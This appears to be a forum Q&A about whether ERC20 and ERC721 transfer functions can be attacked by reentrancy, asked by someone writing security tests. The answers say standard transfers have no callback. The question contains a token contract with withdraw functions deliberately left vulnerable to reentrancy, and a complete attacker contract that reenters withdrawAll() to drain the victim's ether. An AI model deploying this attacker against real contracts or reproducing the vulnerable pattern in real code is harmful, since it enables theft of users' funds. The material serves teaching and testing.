# How to write a function that performs reentrant calls to an ERC20 token transfer() and transferFrom() functions?

Tags: solidity, reentrant-attacks

## Description

I was writing security tests for an `ERC20` token. I was researching online about reentrancy attacks and found that it is mainly accomplished by using a `fallback()` or `receive()` function in the malicious contract that recursively calls the `withdrawEthers()` function of the victim contract and eventually drains all the stored funds.

Now, my question is: Is it possible to write such a reentrant function that performs similar recursive calls to an unsafe `ERC20.transfer()` or `ERC20.transferFrom()` function or as a matter of fact even `ERC721.transfer()` to steal the tokens?

## Contract Source Code

Below is a dummy unsafe token and an attacker contract for reference:

### DummyToken.sol

```
//SPDX-License-Identifier: Unlicense

pragma solidity ^0.8.0;

import "hardhat/console.sol";
import "@openzeppelin/contracts/utils/Address.sol";

contract DummyERC20 {
    using Address for address payable;

    string public constant NAME = "DummyToken";
    string public constant SYMBOL = "DMY";
    uint8 public constant decimals = 18;
    uint256 _totalSupply;

    struct Allowed {
        mapping (address => uint256) _allowed;
    }

    mapping (address => Allowed) allowed;
    mapping (address => uint256)  balances;

    event Transfer (address indexed _from, address indexed _to, uint256 _amount);
    event Approval (address indexed _owner, address indexed _spender, uint256 _amount);
    event TransferFrom (address indexed _spender, address indexed _from, address indexed _to, uint256 _amount);
    event Deposit (address indexed _caller, uint256 _amount);
    event Withdraw (address indexed _caller, uint256 _amount);

    function totalSupply () external view returns (uint256) {
        return _totalSupply;
    }

    function balanceOf (address _of) external view returns (uint256) {
        require (_of != address(0), "DummyToken: Cannot compute balance of null address");
        return balances[_of];
    }

    function deposit () external payable {
        balances[msg.sender] += msg.value;
        _totalSupply += msg.value;
        emit Deposit(msg.sender, msg.value);
    }

    function withdraw (uint256 _amount) external {
        require (_amount <= balances[msg.sender], "DummyToken: Not enough balance");
        payable(msg.sender).sendValue(_amount);
        balances[msg.sender] -= _amount;
        _totalSupply -= _amount;
        emit Withdraw(msg.sender, _amount);
    }

    function withdrawAll () external {
        require (balances[msg.sender] > 0, "DummyToken: Not enough balance");
        payable(msg.sender).sendValue(balances[msg.sender]);

        // console.log("DummyToken contract balance: ", contractBalance());
        // console.log("Caller Balance: ", balances[msg.sender]);

        balances[msg.sender] = 0;
        _totalSupply -= balances[msg.sender];
        emit Withdraw(msg.sender, balances[msg.sender]);
    }

    function transfer (address _to, uint256 _amount) external {
        require (_amount < balances[msg.sender], "DummyToken: Not enough balance");
        require (_to != address(0), "DummyToken: Cannot transfer tokens to null address");
        balances[_to] += _amount;
        balances[msg.sender] -= _amount;
        emit Transfer(msg.sender, _to, _amount);
    }

    function approve (address _spender, uint256 _amount) external {
        require(_spender != address(0), "DummyToken: Spender cannot be null address");
        allowed[msg.sender]._allowed[_spender] = _amount;
        emit Approval(msg.sender, _spender, _amount);
    }

    function allowance (address _owner, address _spender) external view returns (uint256) {
        require (_owner != address(0) && _spender != address(0), "DummyToken: Owner or spender cannot be null address");
        return allowed[msg.sender]._allowed[_spender];
    }

    function transferFrom (address _from, address _to, uint256 _amount) external {
        require (_from != address(0) && _to != address(0), "DummyToken: From or to addresses cannot be null address");
        require (_amount <= allowed[_from]._allowed[msg.sender], "DummyToken: Spender does not have enough allowance");
        require (_amount <= balances[_from], "DummyToken: From address does not have enough balance");
        balances[_to] += _amount;
        balances[_from] -= _amount;
        allowed[_from]._allowed[msg.sender] -= _amount;
        emit TransferFrom(msg.sender, _from, _to, _amount);
    }

    function contractBalance () public view returns (uint256) {
        return address(this).balance;
    }
}
```

### DummyAttacker.sol

```
//SPDX-License-Identifier: Unlicense

pragma solidity ^0.8.0;

import "hardhat/console.sol";
import "./DummyToken.sol";

contract DummyAttacker {
    DummyERC20 public immutable victim;
    address public owner;

    constructor (address _victim) {
        victim = DummyERC20(_victim);
        owner = msg.sender;
    }

    function deposit () external payable {
        require (msg.sender == owner);
        victim.deposit{value: msg.value}();
    }

    function withdraw () external {
        require (msg.sender == owner);
        victim.withdrawAll();
    }

    function attack () external payable {
        require (msg.sender == owner);
        victim.withdrawAll();
    }

    receive () external payable {
        if (victim.contractBalance() > 0) {
            console.log("Reentering");
            victim.withdrawAll();
        } else {
            console.log("Attack success!!! Victim account drained.");
        }
    }

    function withdrawSpoils () external {
        require (msg.sender == owner);
        payable(owner).transfer(address(this).balance);
    }

    function getBalance () external view returns (uint256, uint256) {
        return (address(this).balance, address(victim).balance);
    }
}
```

Answer (score 3):

No. Since a contract cannot be "warned" that it received ERC20 tokens (i.e. ERC20's `transfer()` function doesnt call back the receiver, as opposed to an ether transfer, which calls the receiver's `fallback()` or `receive()` function), it's not possible to exploit it with reentrancy attacks. Standards such as `ERC777`, which extends the ERC20 standard by adding a callback mechanism, introduce this possibility. Aditionally, you mentionned `ERC721` in your question, its `transfer()` function doesnt call back the receiver, so it cannot be reentered, but (somewhat ironically) its `safeTransfer()` function does (although its standard (openzeppelin) implementation is indeed safe).

On a side note, your `DummyERC20.sol` (which is basically WETH, by the way) `withdraw()` and `withdrawAll()` function are vulnerable to reentrancy attacks.

Answer (score 2):

Since the standard ERC20 doesn't provide an fallback mechanism for transfers it is not exploitable with reentrancy attacks, unless the ERC20 contract itself the is a malicious one.

There are tokens that perform additional functionality in every transfer, e.g. charging fees, rebalancing a pool pair, etc. This extra functionality might be the target for reentrancy problems.